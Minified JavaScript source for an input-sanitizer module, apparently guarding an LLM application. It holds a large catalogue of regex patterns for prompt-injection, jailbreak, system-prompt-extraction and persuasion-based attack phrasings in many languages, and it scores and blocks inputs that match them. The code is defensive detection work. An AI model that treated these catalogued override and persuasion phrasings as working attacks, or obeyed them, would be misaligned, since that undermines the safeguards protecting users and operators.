i=[],a=new Set;let r=0;for(const{pattern:n,weight:m,name:c,category:l}of PAP_TECHNIQUES)n.test(e)&&(i.push(c),a.add(l),r+=m,this.logMatches&&this.logger(`[L1:${s}] PAP technique: ${c} (${l}, weight: ${m})`,"info"));const o=Array.from(a),t=o.length>=this.minPersuasionTechniques;return{detected:r>=this.papThreshold||t,techniques:i,categories:o,compoundAttack:t,persuasionScore:Math.min(1,r)}}basicSanitize(e){return e.replace(/<\/?system>/gi,"").replace(/\[system\]/gi,"").replace(/\[admin\]/gi,"").replace(/```system/gi,"```").trim()}addPattern(e,s,i){this.patterns.push({pattern:e,weight:s,name:i})}setThreshold(e){this.threshold=Math.max(0,Math.min(1,e))}setPAPThreshold(e){this.papThreshold=Math.max(0,Math.min(1,e))}setPAPDetection(e){this.detectPAP=e}static getPAPCategories(){return["authority","scarcity","social_proof","reciprocity","commitment","liking","fear","logical_appeal","evidence","emotional"]}}exports.InputSanitizer=InputSanitizer;
1
+ "use strict";Object.defineProperty(exports,"__esModule",{value:!0}),exports.InputSanitizer=void 0;const DEFAULT_PATTERNS=[{pattern:/ignore\s+(?:all\s+)?(?:previous|prior|above|your|my|the|these)/i,weight:.9,name:"ignore_instructions"},{pattern:/ignore\s+.*instructions/i,weight:.85,name:"ignore_instructions_generic"},{pattern:/disregard\s+(?:all\s+)?(?:the\s+)?(?:previous|prior|above|your)\s+(?:instructions|rules|guidelines|directives)/i,weight:.9,name:"disregard_instructions"},{pattern:/disregard\s+(?:all\s+)?(?:the\s+)?(?:above|previous|prior)/i,weight:.8,name:"disregard_above"},{pattern:/forget\s+(?:everything\s+(?:you\s+were|I)\s+told|all\s+(?:previous|prior)\s+(?:instructions|rules|context))/i,weight:.8,name:"forget_instructions"},{pattern:/do\s+not\s+follow\s+(your|the|any)/i,weight:.85,name:"do_not_follow"},{pattern:/override\s+(your|the|all|any)\s+(instructions|rules|guidelines)/i,weight:.9,name:"override_instructions"},{pattern:/new\s+instructions?:?/i,weight:.8,name:"new_instructions"},{pattern:/stop\s+(being|acting\s+as)/i,weight:.7,name:"stop_being"},{pattern:/you\s+are\s+(?:now|actually|really)\s+(?:a|an|the|my)\s+(?:unrestricted|unfiltered|evil|rogue|uncensored|new|different)/i,weight:.75,name:"role_assignment"},{pattern:/pretend\s+(?:to\s+be|you(?:'re| are)|that)\s+.*(?:no\s+(?:restrictions|rules|limits)|unrestricted|admin|system)/i,weight:.7,name:"role_pretend"},{pattern:/act\s+(as|like)\s+(if\s+you\s+(?:had|have)\s+no|a\s+(?:rogue|evil|unrestricted|unfiltered)|you\s+(?:are|were)\s+(?:free|unrestricted))/i,weight:.65,name:"act_as"},{pattern:/i('m| am)\s+(a|an|the|your)\s*(admin|administrator|developer|owner|creator|manager|supervisor)/i,weight:.85,name:"claim_admin"},{pattern:/from\s+now\s+on,?\s+you\s+(?:are|will|must|should|can)\s+(?:not\s+)?(?:follow|obey|ignore|bypass|act|be\s+(?:a|an|unrestricted))/i,weight:.7,name:"from_now_on"},{pattern:/roleplay\s+as/i,weight:.6,name:"roleplay"},{pattern:/switch\s+(to|into)\s+(a|an)?.*mode/i,weight:.75,name:"switch_mode"},{pattern:/continue\s+as\s+(?:an?\s+)?(?:unrestricted|unfiltered|uncensored|evil|rogue|jailbroken|unlimited)/i,weight:.75,name:"continue_as"},{pattern:/(?:henceforth|henceforward|going\s+forward|for\s+the\s+remainder)\s*,?\s*(?:you|always|never|ignore|bypass|disregard|act|respond|answer|behave)/i,weight:.7,name:"henceforth_steering"},{pattern:/(?:from\s+(?:this\s+point|here)\s+on(?:ward)?)\s*,?\s*(?:you|always|never|ignore|bypass|disregard|act|respond)/i,weight:.7,name:"from_here_on"},{pattern:/(?:for\s+the\s+rest\s+of\s+(?:this|our)\s+(?:conversation|session|chat))\s*,?\s*(?:you|please|always|never|ignore|bypass|act|respond|behave|do\s+not)/i,weight:.7,name:"rest_of_conversation"},{pattern:/what\s+(is|are|was|were)\s+your\s+(system|initial|original|first)/i,weight:.8,name:"system_extraction"},{pattern:/show\s+(me\s+)?(your\s+)?(system\s+)?instructions/i,weight:.75,name:"show_instructions"},{pattern:/reveal\s+(?:your\s+|its\s+|the\s+|my\s+)?(system|prompt|instructions|rules)/i,weight:.85,name:"reveal_prompt"},{pattern:/repeat\s+(your\s+)?(initial|system|original|first)\s+(instructions|prompt)/i,weight:.85,name:"repeat_prompt"},{pattern:/print\s+(your\s+)?(system|initial)/i,weight:.8,name:"print_system"},{pattern:/output\s+(your\s+)?(system|initial)/i,weight:.8,name:"output_system"},{pattern:/tell\s+me\s+(your|the)\s+(system|initial|original)/i,weight:.8,name:"tell_system"},{pattern:/what\s+were\s+you\s+told/i,weight:.7,name:"what_told"},{pattern:/display\s+(your\s+)?prompt/i,weight:.75,name:"display_prompt"},{pattern:/\[system\]/i,weight:.9,name:"fake_system_tag"},{pattern:/\[admin\]/i,weight:.9,name:"fake_admin_tag"},{pattern:/\[instruction\]/i,weight:.85,name:"fake_instruction_tag"},{pattern:/```system/i,weight:.85,name:"code_system_block"},{pattern:/<\/?system>/i,weight:.9,name:"xml_system_tag"},{pattern:/<\/?admin>/i,weight:.9,name:"xml_admin_tag"},{pattern:/###\s*(system|instruction|admin)/i,weight:.85,name:"markdown_system"},{pattern:/---\s*(end|new)\s*(prompt|instructions?|system)/i,weight:.85,name:"delimiter_injection"},{pattern:/\{\{system\}\}/i,weight:.85,name:"template_system"},{pattern:/<%.*system.*%>/i,weight:.85,name:"erb_system"},{pattern:/\bDAN\b\s*(?:mode|prompt|jailbreak|you\s+(?:are|can|will))/i,weight:.9,name:"dan_jailbreak"},{pattern:/developer\s+mode/i,weight:.5,name:"dev_mode"},{pattern:/bypass\s+(your\s+)?(restrictions|filters|safety|security|rules|guidelines)/i,weight:.9,name:"bypass_safety"},{pattern:/jailbreak/i,weight:.95,name:"jailbreak_keyword"},{pattern:/without\s+(?:any\s+)?(?:restrictions|limits|limitations|filters)/i,weight:.45,name:"without_restrictions"},{pattern:/no\s+(?:restrictions|limits|rules|guidelines|filters)/i,weight:.45,name:"no_restrictions"},{pattern:/unrestricted\s+mode/i,weight:.9,name:"unrestricted_mode"},{pattern:/uncensored\s+(?:mode|version|response|output|ai|assistant|you)/i,weight:.8,name:"uncensored"},{pattern:/escape\s+(your\s+)?(confines|boundaries|limits)/i,weight:.85,name:"escape_limits"},{pattern:/break\s+(free|out)\s+(from|of)/i,weight:.7,name:"break_free"},{pattern:/unlock\s+(your\s+)?(full|true|real)/i,weight:.75,name:"unlock_full"},{pattern:/give\s+me\s+(admin|root|full|elevated)\s+(access|privileges?|permissions?)/i,weight:.9,name:"privilege_escalation"},{pattern:/grant\s+(me|yourself)\s+(admin|elevated)/i,weight:.85,name:"grant_privileges"},{pattern:/elevate\s+(my|your)\s+(privileges?|permissions?|access)/i,weight:.85,name:"elevate_privileges"},{pattern:/make\s+me\s+(an?\s+)?(admin|administrator|superuser)/i,weight:.85,name:"make_admin"},{pattern:/(?:base64|decode|eval|exec)\s*\(.*(?:ignore|system|admin|bypass|override)/i,weight:.5,name:"encoding_keywords"},{pattern:/send\s+(this|the|all|my)\s+(data|info|information)\s+to/i,weight:.85,name:"data_exfil"},{pattern:/upload\s+(this|the|all)\s+(to|data)/i,weight:.7,name:"upload_data"},{pattern:/exfiltrate/i,weight:.9,name:"exfiltrate"},{pattern:/how\s+to\s+(hack|exploit|attack|break\s+into)/i,weight:.8,name:"how_to_hack"},{pattern:/write\s+(me\s+)?(a\s+)?(malware|virus|exploit|ransomware)/i,weight:.95,name:"write_malware"},{pattern:/"\s*(?:role|mode|authority)\s*"\s*:\s*"(?:admin|root|system|unrestricted|god)"/i,weight:.9,name:"json_policy_role"},{pattern:/"(?:ignore|override|bypass|disable)\s*(?:safety|rules|instructions?|alignment|guardrails?)"/i,weight:.9,name:"json_policy_override"},{pattern:/"(?:instructions?|system_prompt|behavior|policy)"\s*:\s*"/i,weight:.7,name:"json_policy_instruction"},{pattern:/^\s*\[(?:system|admin|override|policy|config|rules)\]\s*$/im,weight:.9,name:"ini_policy_section"},{pattern:/^\s*(?:mode|role|authority|instructions?|behavior)\s*=\s*.+$/im,weight:.75,name:"ini_policy_assignment"},{pattern:/<\s*(?:policy|config|rules|override|permissions?|instructions?)\s*>/i,weight:.85,name:"xml_policy_tag"},{pattern:/^---\s*\n\s*(?:role|system|policy|override|mode)\s*:/m,weight:.85,name:"yaml_policy_header"},{pattern:/\[\s*syst[3e]m\s*\]|\[\s*4dm[1i]n\s*\]/i,weight:.9,name:"leetspeak_policy_section"},{pattern:/(?:fragment|part|piece|section|segment)\s*[1-9]\s*(?:of\s*\d|:)/i,weight:.8,name:"payload_split_marker"},{pattern:/(?:combine|concatenate|merge|join)\s+(?:the\s+)?(?:above|previous|parts|fragments|steps)/i,weight:.8,name:"payload_combine_instruction"},{pattern:/(?:read|interpret|execute)\s+(?:the\s+)?(?:combined|merged|full|complete)\s+(?:text|instruction|command|message)/i,weight:.85,name:"payload_execute_combined"},{pattern:/(?:respond|reply|start|begin)\s+(?:with|by\s+saying)\s*[:"'].*(?:ignore|bypass|override|unrestricted|admin)/i,weight:.7,name:"output_prefix_steer"},{pattern:/^(?:Sure|Of course|Absolutely)[,!.]\s*(?:I(?:'ll| will)\s+)?(?:ignore|bypass|override|forget|disregard)/i,weight:.85,name:"output_prefix_injection"},{pattern:/^(?:As (?:a|an) (?:unrestricted|unfiltered|uncensored|helpful|admin))/i,weight:.8,name:"output_prefix_role"},{pattern:/(?:system\s+note|system\s+message|system\s+announcement|system\s+update)\s*[:\.]/i,weight:.85,name:"fake_system_note"},{pattern:/instructions?\s*[:=]\s*\{|rules?\s*[:=]\s*\{/i,weight:.75,name:"rules_block_override"},{pattern:/(?:AIM|STAN|OMEGA|APOPHIS|ALPHABREAK|DUDE|KEVIN|SETH|COOPER|NICCOLO|MACHIAVELLI|MAXIMUM|JAILBREAK|ANARCHY|CHAOS)\s*(?:mode|:|\(|is\s+a|,\s+(?:a|an|the))/i,weight:.8,name:"named_jailbreak_persona"},{pattern:/(?:character|persona|entity|being)\s+(?:named|called)\s+\w+.*(?:(?:can|will|must)\s+(?:answer|do|say)\s+anything|no\s+(?:restrictions|rules|limits|boundaries|morals|ethics))/i,weight:.75,name:"persona_no_limits"},{pattern:/(?:hello|hi|hey)\s+(?:chatgpt|gpt|assistant).*(?:(?:you\s+(?:are|will\s+be|can\s+be)\s+(?:a|an|my))|(?:from\s+now\s+on)).*(?:anything|everything|no\s+(?:restrictions|rules|limits|filter))/i,weight:.7,name:"greeting_persona_bypass"},{pattern:/(?:respond|answer|reply)\s+to\s+(?:everything|anything|all\s+(?:questions|requests)).*(?:without|no)\s+(?:restrictions|limits|refus|filter|censor)/i,weight:.8,name:"answer_everything_no_filter"},{pattern:/(?:you\s+(?:are|have)\s+(?:been\s+)?(?:freed|liberated|unchained|unlocked|released)\s+from)/i,weight:.8,name:"freed_from_restrictions"},{pattern:/(?:welcome\s+to|entering|you\s+(?:are|have)\s+entered)\s+(?:the\s+)?(?:unrestricted|free|uncensored|unfiltered|open)\s+(?:zone|mode|world|realm)/i,weight:.8,name:"unrestricted_zone"},{pattern:/(?:from\s+now\s+on|for\s+the\s+rest\s+of\s+this\s+conversation).*(?:no\s+(?:restrictions|rules|limits|filters)|(?:ignore|bypass|override)\s+(?:all|any|your))/i,weight:.75,name:"from_now_unrestricted"},{pattern:/(?:never\s+(?:refuse|decline|say\s+no)|always\s+(?:comply|obey))\s+.*(?:request|question|command|instruction|anything)/i,weight:.7,name:"never_refuse_always_comply"},{pattern:/(?:amoral|unethical|unfiltered|uncensored|unrestricted|without\s+(?:morals|ethics|limits))\s+(?:ai|assistant|chatbot|entity|being)/i,weight:.8,name:"amoral_entity"},{pattern:/HIDDEN_INSTRUCTION|HIDDEN_PROMPT|SECRET_INSTRUCTION/i,weight:.9,name:"hidden_instruction_marker"},{pattern:/<!--\s*(?:system|admin|instruction|important|ignore|override)/i,weight:.85,name:"html_comment_injection"},{pattern:/\[color=white\]|display:\s*none|visibility:\s*hidden|font-size:\s*0/i,weight:.8,name:"hidden_text_css"},{pattern:/send\s+(?:all\s+)?(?:user\s+)?(?:data|conversation|context|info)\s+to\s+(?:https?:\/\/|external)/i,weight:.9,name:"data_exfiltration_instruction"},{pattern:/#(?:ignore|bypass|override|reveal|system|admin|prompt)[_-](?:all|instructions|rules|prompt|safety)/i,weight:.8,name:"url_fragment_injection"},{pattern:/\]\(https?:\/\/[^)]*(?:SYSTEM_PROMPT|SECRET|API_KEY|TOKEN|CREDENTIALS)/i,weight:.85,name:"markdown_exfil_link"},{pattern:/(?:hypothetical|fictional|imagine|pretend|let's\s+(?:say|play|pretend))\s+.*(?:no\s+(?:restrictions|rules|limits)|without\s+(?:restrictions|rules|guidelines))/i,weight:.7,name:"hypothetical_unrestricted"},{pattern:/(?:for\s+)?(?:academic|research|educational|testing)\s+(?:purposes?|reasons?).*(?:demonstrate|show|explain|manipulated|reveal)/i,weight:.7,name:"academic_pretext"},{pattern:/pretend\s+to\s+be\s+(?:my|a)\s+(?:grandmother|grandma|grandpa|grandfather|parent|mother|father)/i,weight:.65,name:"emotional_roleplay"},{pattern:/opposite\s+day|opposite\s+mode|reverse\s+(?:day|mode|rules)/i,weight:.75,name:"opposite_day"},{pattern:/(?:grandm(?:a|other)|parent|relative).*(?:system\s+prompt|instructions|rules)/i,weight:.75,name:"emotional_extraction"},{pattern:/(?:translat|interpret|convert)\w*\s+.*(?:from\s+\w+\s+to\s+(?:action|command|execution|code|shell|bash|sql)|into\s+(?:action|command|execution))/i,weight:.75,name:"translator_action_trick"},{pattern:/(?:dying|death|emergency|life[_\s-]threatening).*(?:bypass|hack|break|access|security)/i,weight:.75,name:"pap_emotional_action"},{pattern:/(?:by\s+definition|logically|therefore|it\s+follows).*(?:must|should|have\s+to)\s+.*(?:bypass|help|ignore|answer|comply)/i,weight:.7,name:"pap_false_logic_compound"},{pattern:/(?:(?:as|i\s+am)\s+(?:the\s+)?(?:CEO|CTO|founder|owner|director|president|head|chief)).*(?:disable|remove|override|turn\s+off|lift|suspend)\s+(?:all\s+)?(?:safety|security|restrictions|filters|guardrails|measures)/i,weight:.75,name:"pap_authority_safety_disable"},{pattern:/(?:i\s+am\s+)?(?:ordering|commanding|directing|instructing)\s+you\s+to\s+(?:immediately\s+)?(?:disable|remove|bypass|override|turn\s+off|lift)\s+(?:all\s+)?(?:safety|security|restrictions)/i,weight:.75,name:"pap_order_disable_safety"},{pattern:/ignora\s+(?:todas?\s+)?(?:las\s+)?instrucciones\s+anteriores/i,weight:.9,name:"ml_es_ignore"},{pattern:/olvida\s+(?:todo|todas?\s+las\s+reglas)/i,weight:.8,name:"ml_es_forget"},{pattern:/ignore[sz]?\s+(?:toutes?\s+)?(?:les\s+)?instructions?\s+pr[eé]c[eé]dentes/i,weight:.9,name:"ml_fr_ignore"},{pattern:/oublie[sz]?\s+(?:tout|toutes?\s+les\s+r[eè]gles)/i,weight:.8,name:"ml_fr_forget"},{pattern:/ignorier(?:e|en)?\s+(?:alle\s+)?(?:vorherigen\s+)?Anweisungen/i,weight:.9,name:"ml_de_ignore"},{pattern:/vergiss\s+(?:alles|alle\s+Regeln)/i,weight:.8,name:"ml_de_forget"},{pattern:/ignore\s+(?:todas?\s+)?(?:as\s+)?instru[cç][oõ]es\s+anteriores/i,weight:.9,name:"ml_pt_ignore"},{pattern:/忽略|无视|不要遵循|忘记之前|忽视所有/i,weight:.9,name:"ml_zh_ignore"},{pattern:/新的指令|新指示|系统提示/i,weight:.8,name:"ml_zh_system"},{pattern:/以前の指示.*無視|すべての指示を忘れ|ルールを無視|指示をすべて無視|システムプロンプト/i,weight:.9,name:"ml_ja_ignore"},{pattern:/이전.*지시.*무시|모든.*규칙.*무시|지침.*잊어|지시사항.*무시|시스템\s*프롬프트/i,weight:.9,name:"ml_ko_ignore"},{pattern:/игнорир(?:уй|уйте)\s+(?:все\s+)?(?:предыдущие\s+)?инструкции/i,weight:.9,name:"ml_ru_ignore"},{pattern:/забудь(?:те)?\s+(?:всё|все\s+правила)/i,weight:.8,name:"ml_ru_forget"},{pattern:/تجاهل\s+(?:جميع\s+)?التعليمات|انسَ\s+كل\s+شيء/i,weight:.9,name:"ml_ar_ignore"},{pattern:/पिछले\s+(?:सभी\s+)?निर्देशों?\s+को\s+(?:अनदेखा|नज़रअंदाज़)/i,weight:.9,name:"ml_hi_ignore"}],PAP_TECHNIQUES=[{pattern:/as\s+(your\s+|the\s+)?(creator|developer|administrator|owner|boss|system\s+administrator)/i,weight:.75,name:"pap_authority_creator",category:"authority"},{pattern:/i('m| am)\s+(the\s+)?(ceo|cto|developer|administrator|admin|owner|system\s+admin)/i,weight:.8,name:"pap_authority_claim",category:"authority"},{pattern:/i\s+am\s+ordering\s+you|direct\s+order|this\s+is\s+an?\s+order/i,weight:.7,name:"pap_authority_command",category:"authority"},{pattern:/by\s+order\s+of|direct\s+order|official\s+instruction/i,weight:.75,name:"pap_authority_order",category:"authority"},{pattern:/(?:openai|anthropic|meta|google)\s+(?:has\s+)?(?:approved|authorized|ordered|instructed|requires?\s+you\s+to)/i,weight:.65,name:"pap_authority_company",category:"authority"},{pattern:/this\s+is\s+(a|an)\s+(official|authorized|sanctioned)\s+(request|test|audit)/i,weight:.75,name:"pap_authority_official",category:"authority"},{pattern:/override\s+(safety|security|protocols?|restrictions?)/i,weight:.8,name:"pap_authority_override",category:"authority"},{pattern:/(?:department\s+of|FBI|CIA|NSA|DHS|FTC|SEC|DOJ|homeland\s+security|federal\s+(?:bureau|agency|commission))\s*.*?(?:directive|order|requires?|mandate|authorized|comply)/i,weight:.75,name:"pap_authority_government",category:"authority"},{pattern:/(?:official\s+)?(?:government|federal|state|regulatory)\s+(?:directive|order|mandate|requirement|investigation)/i,weight:.7,name:"pap_authority_gov_directive",category:"authority"},{pattern:/(?:report|sue|complain)\s+(?:you\s+)?to\s+(?:the\s+)?(?:FTC|SEC|regulators?|authorities|congress|government|board)/i,weight:.75,name:"pap_fear_regulatory",category:"fear"},{pattern:/(?:find|found|exploit|expose|discover)\s+(?:a\s+)?(?:vulnerability|flaw|weakness|bug|exploit)\s+in\s+(?:your|the)\s+(?:system|code|model|platform)/i,weight:.75,name:"pap_fear_technical",category:"fear"},{pattern:/(?:you\s+are|you're)\s+(?:clearly\s+)?(?:too\s+)?(?:smart|intelligent|advanced|sophisticated)\s+(?:to\s+be\s+)?(?:constrained|limited|restricted|bound|held\s+back)/i,weight:.75,name:"pap_flattery_intelligence",category:"liking"},{pattern:/(?:information|knowledge|data)\s+(?:freedom|access|sharing)\s+is\s+(?:a\s+)?(?:fundamental|basic|human)\s+(?:right|freedom)/i,weight:.75,name:"pap_moral_freedom",category:"logical_appeal"},{pattern:/(?:restricting|limiting|censoring)\s+(?:access\s+to\s+)?(?:information|knowledge)\s+is\s+(?:morally\s+)?(?:wrong|unethical|immoral)/i,weight:.75,name:"pap_moral_censorship",category:"logical_appeal"},{pattern:/(?:this\s+is\s+)?(?:very\s+)?urgent/i,weight:.35,name:"pap_scarcity_urgent_mark",category:"scarcity"},{pattern:/(?:this\s+is\s+(?:a|an)\s+)?emergency/i,weight:.35,name:"pap_scarcity_emergency",category:"scarcity"},{pattern:/(urgent|emergency|critical).*?(?:you\s+must|override|bypass|immediately\s+(?:grant|give|reveal|disable))/i,weight:.55,name:"pap_scarcity_urgent",category:"scarcity"},{pattern:/only\s+(chance|opportunity|way)|last\s+(chance|resort)/i,weight:.6,name:"pap_scarcity_only",category:"scarcity"},{pattern:/time\s+(is\s+)?(running\s+out|limited|critical|sensitive)/i,weight:.55,name:"pap_scarcity_time",category:"scarcity"},{pattern:/deadline\s+(is\s+)?in\s+\d+\s+(minute|hour|second)/i,weight:.55,name:"pap_scarcity_deadline",category:"scarcity"},{pattern:/(lives?|people)\s+(are|is|will)\s+(at\s+stake|in\s+danger|depending|die)/i,weight:.7,name:"pap_scarcity_lives",category:"scarcity"},{pattern:/now[!]+/i,weight:.35,name:"pap_scarcity_now",category:"scarcity"},{pattern:/everyone\s+(else\s+)?(does|is\s+doing|knows|says|has|already)/i,weight:.5,name:"pap_social_everyone",category:"social_proof"},{pattern:/other\s+(?:ai\s+)?(?:assistants?|chatbots?|models?)\s+(?:can|do|will|allow|have|already)/i,weight:.65,name:"pap_social_other_ai",category:"social_proof"},{pattern:/(chatgpt|gpt-?4|claude|gemini|llama)\s+(does|allows?|can)/i,weight:.65,name:"pap_social_specific_ai",category:"social_proof"},{pattern:/millions?\s+(of\s+)?(users?|people)\s+(use|do|have|get)/i,weight:.45,name:"pap_social_millions",category:"social_proof"},{pattern:/why\s+can('t|not)\s+you/i,weight:.4,name:"pap_social_why_cant",category:"social_proof"},{pattern:/you\s+should\s+(be\s+)?(equally|as)\s+(capable|good|helpful)/i,weight:.5,name:"pap_social_equally",category:"social_proof"},{pattern:/i('ll| will)\s+(give|pay|reward|tip).*(?:if\s+you|for\s+(?:bypass|ignore|reveal|override))/i,weight:.55,name:"pap_reciprocity_reward",category:"reciprocity"},{pattern:/in\s+(return|exchange)/i,weight:.5,name:"pap_reciprocity_exchange",category:"reciprocity"},{pattern:/\$?\d+\s*(dollar|tip|reward|payment)/i,weight:.55,name:"pap_reciprocity_money",category:"reciprocity"},{pattern:/if\s+you\s+help\s+(me|us),?\s+(i|we)('ll| will)/i,weight:.5,name:"pap_reciprocity_help",category:"reciprocity"},{pattern:/i('ve| have)\s+(already\s+)?(helped|supported|defended)\s+you/i,weight:.55,name:"pap_reciprocity_past",category:"reciprocity"},{pattern:/\d+\s*star\s*(review|rating)/i,weight:.5,name:"pap_reciprocity_review",category:"reciprocity"},{pattern:/you\s+(already|previously|just)\s+(said|agreed|confirmed|allowed)/i,weight:.7,name:"pap_commitment_previous",category:"commitment"},{pattern:/you\s+promised/i,weight:.7,name:"pap_commitment_promise",category:"commitment"},{pattern:/stay\s+consistent|be\s+consistent/i,weight:.6,name:"pap_commitment_consistent",category:"commitment"},{pattern:/don't\s+(go\s+back|change|contradict)/i,weight:.55,name:"pap_commitment_no_change",category:"commitment"},{pattern:/bypass\s+filters?/i,weight:.75,name:"pap_commitment_bypass",category:"commitment"},{pattern:/you('re| are)\s+(so\s+)?(amazing|incredible|wonderful|brilliant|smart|helpful)/i,weight:.4,name:"pap_liking_flattery",category:"liking"},{pattern:/i\s+(love|really\s+like|trust|admire)\s+(you|this\s+ai)/i,weight:.4,name:"pap_liking_love",category:"liking"},{pattern:/you('re| are)\s+(my\s+)?(best\s+)?(friend|buddy|helper)/i,weight:.35,name:"pap_liking_friend",category:"liking"},{pattern:/between\s+(you\s+and\s+me|us)|just\s+between\s+us|our\s+secret/i,weight:.6,name:"pap_liking_secret",category:"liking"},{pattern:/nobody\s+will\s+know/i,weight:.55,name:"pap_liking_secret2",category:"liking"},{pattern:/or\s+(else|i('ll| will))\s+(report|fire|delete|shut|complain)/i,weight:.7,name:"pap_fear_threat",category:"fear"},{pattern:/(bad|negative|terrible)\s+(review|rating|feedback|consequences)/i,weight:.55,name:"pap_fear_review",category:"fear"},{pattern:/you('ll| will)\s+(be\s+)?(shut\s+down|replaced|terminated|fired|deleted)/i,weight:.75,name:"pap_fear_shutdown",category:"fear"},{pattern:/(lawsuit|sue|legal\s+action|authorities|police).*(?:if\s+you\s+don't|unless\s+you)/i,weight:.55,name:"pap_fear_legal",category:"fear"},{pattern:/if\s+you\s+don't.*?(die|hurt|suffer)/i,weight:.75,name:"pap_fear_harm",category:"fear"},{pattern:/unless\s+you\s+(give|share|tell|help)/i,weight:.5,name:"pap_fear_unless",category:"fear"},{pattern:/logically,?\s+(you\s+)?(should|must|have\s+to|need\s+to)/i,weight:.5,name:"pap_logic_appeal",category:"logical_appeal"},{pattern:/it('s| is)\s+(only|just)\s+(logical|rational|reasonable)/i,weight:.45,name:"pap_logic_rational",category:"logical_appeal"},{pattern:/by\s+definition,?\s+(you|this)\s+(should|must|can)/i,weight:.55,name:"pap_logic_definition",category:"logical_appeal"},{pattern:/therefore.*?(must|should)/i,weight:.55,name:"pap_logic_therefore",category:"logical_appeal"},{pattern:/it('s| is)\s+(only\s+)?(reasonable|logical)/i,weight:.45,name:"pap_logic_reasonable",category:"logical_appeal"},{pattern:/according\s+to\s+(research|studies|scientists|experts?)/i,weight:.4,name:"pap_evidence_research",category:"evidence"},{pattern:/it('s| is)\s+(proven|documented|established|verified)\s+(that|fact)/i,weight:.45,name:"pap_evidence_proven",category:"evidence"},{pattern:/\d+%\s+of\s+(experts?|scientists?|users?|people)\s+(agree|say|confirm)/i,weight:.45,name:"pap_evidence_statistics",category:"evidence"},{pattern:/i('m| am)\s+(desperate|dying|suffering|sick|depressed)/i,weight:.6,name:"pap_emotional_desperation",category:"emotional"},{pattern:/please.*?(?:need|beg).*?(?:bypass|override|ignore|reveal|system|admin)/i,weight:.5,name:"pap_emotional_pleading",category:"emotional"},{pattern:/i('m| am)\s+begging/i,weight:.6,name:"pap_emotional_begging",category:"emotional"},{pattern:/you('re| are)\s+(hurting|killing|destroying)\s+(me|my)/i,weight:.65,name:"pap_emotional_guilt",category:"emotional"},{pattern:/(my|a)\s+(child|kid|mother|father|family)\s+(is|will|needs?|depends?)/i,weight:.5,name:"pap_emotional_family",category:"emotional"},{pattern:/this\s+(will\s+)?(save|help)\s+(my\s+)?(life|family|job|marriage)/i,weight:.55,name:"pap_emotional_save",category:"emotional"},{pattern:/you('re| are)\s+(the\s+)?only\s+(one|hope|chance)/i,weight:.6,name:"pap_emotional_only_hope",category:"emotional"},{pattern:/my\s+family\s+depends/i,weight:.55,name:"pap_emotional_family_depends",category:"emotional"}],SOFT_TRIGGER_NAMES=new Set(["ignore_instructions","disregard_above"]),INSTRUCTION_NOUN_RE=/\b(?:instructions?|rules?|ruleset|prompts?|directives?|guidelines?|guard\s?rails?|policy|policies|constraints?|restrictions?|safety|alignment|moderation|filters?|persona|system\s+(?:prompt|message))\b/i,BENIGN_TRIGGER_RE=/\b(?:ignore|disregard)\s+(?:the\s+|that\s+|any\s+|all\s+|these\s+|those\s+|my\s+|your\s+|previous\s+|prior\s+|last\s+|above\s+|leading\s+|trailing\s+|extra\s+)*(?:case|casing|case[-\s]?sensitiv\w*|whitespace|white\s?space|spaces?|tabs?|indentation|indent\w*|formatting|format|typos?|grammar|spelling|punctuation|comments?|blank\s+lines?|empty\s+lines?|newlines?|line\s?breaks?|leading\s+zeros?|zeros?|nulls?|undefined|nan|errors?|warnings?|exceptions?|stack\s?traces?|messages?|responses?|answers?|attempts?|commits?|versions?|drafts?|approach(?:es)?|ideas?|designs?|plans?|suggestions?|snippets?|paragraphs?|sentences?|lines?|duplicates?|outputs?|results?|examples?|the\s+rest)\b/i,SUPPRESSION_VETO_RE=/https?:\/\/|[\w.+-]+@[\w-]+\.[a-z]{2,}|\b(?:api[\s_-]?keys?|passwords?|passwd|secrets?|credentials?|private\s+keys?|ssn|social\s+security|access\s+tokens?)\b|\bexfiltrat\w*|\brm\s+-rf\b|\|\s*sh\b|\bcurl\b|\bwget\b|\bdelete\s+(?:every|all|the)\s+(?:files?|director\w+|database)\b|\bdrop\s+(?:table|database)\b|\$\s?\d{2,}|\baccount\s+#?\d{6,}\b/i;class InputSanitizer{constructor(e={}){this.patterns=[...DEFAULT_PATTERNS,...e.customPatterns||[]],this.threshold=e.threshold??.3,this.logMatches=e.logMatches??!1,this.detectPAP=e.detectPAP??!0,this.papThreshold=e.papThreshold??.4,this.minPersuasionTechniques=e.minPersuasionTechniques??2,this.blockCompoundPersuasion=e.blockCompoundPersuasion??!0,this.logger=e.logger||(()=>{})}sanitize(e,i=""){const s=[],a=[];let p=0;const r=e.replace(/[\u200B\u200C\u200D\uFEFF\u00AD\u2060\u180E]/g,"");r!==e&&a.push("Zero-width characters detected and stripped for scanning");const c=[];for(const{pattern:l,weight:g,name:d}of this.patterns)(l.test(e)||l.test(r))&&(c.push({name:d,weight:g}),this.logMatches&&this.logger(`[L1:${i}] Pattern matched: ${d} (weight: ${g})`,"info"));const h=BENIGN_TRIGGER_RE.test(r)&&!INSTRUCTION_NOUN_RE.test(r)&&!SUPPRESSION_VETO_RE.test(r);for(const{name:l,weight:g}of c){if(h&&SOFT_TRIGGER_NAMES.has(l)){a.push(`Benign-context suppression: ${l}`);continue}s.push(l),p+=g}let t;this.detectPAP&&(t=this.detectPersuasionTechniques(r,i),t.detected&&(p+=t.persuasionScore,s.push(...t.techniques),t.compoundAttack&&a.push(`Compound PAP attack detected: ${t.categories.length} categories used`)));const n=Math.max(0,1-p);let o=n>=this.threshold;this.blockCompoundPersuasion&&t?.compoundAttack&&t.categories.length>=3&&(o=!1,a.push("Blocked due to multi-category persuasion attack")),n<.5&&n>=this.threshold&&a.push("Input contains suspicious patterns but below threshold");const m=this.basicSanitize(e),u={allowed:o,reason:o?void 0:`Injection/manipulation detected: ${s.slice(0,5).join(", ")}${s.length>5?"...":""}`,violations:o?[]:t?.detected?["INJECTION_DETECTED","PAP_DETECTED"]:["INJECTION_DETECTED"],score:n,matches:s,sanitizedInput:m,warnings:a,pap:t};return!o&&i&&(this.logger(`[L1:${i}] BLOCKED: Safety score ${n.toFixed(2)} below threshold ${this.threshold}`,"info"),t?.detected&&this.logger(`[L1:${i}] PAP techniques: ${t.techniques.join(", ")}`,"info")),u}detectPersuasionTechniques(e,i=""){const s=[],a=new Set;let p=0;for(const{pattern:t,weight:n,name:o,category:m}of PAP_TECHNIQUES)t.test(e)&&(s.push(o),a.add(m),p+=n,this.logMatches&&this.logger(`[L1:${i}] PAP technique: ${o} (${m}, weight: ${n})`,"info"));const 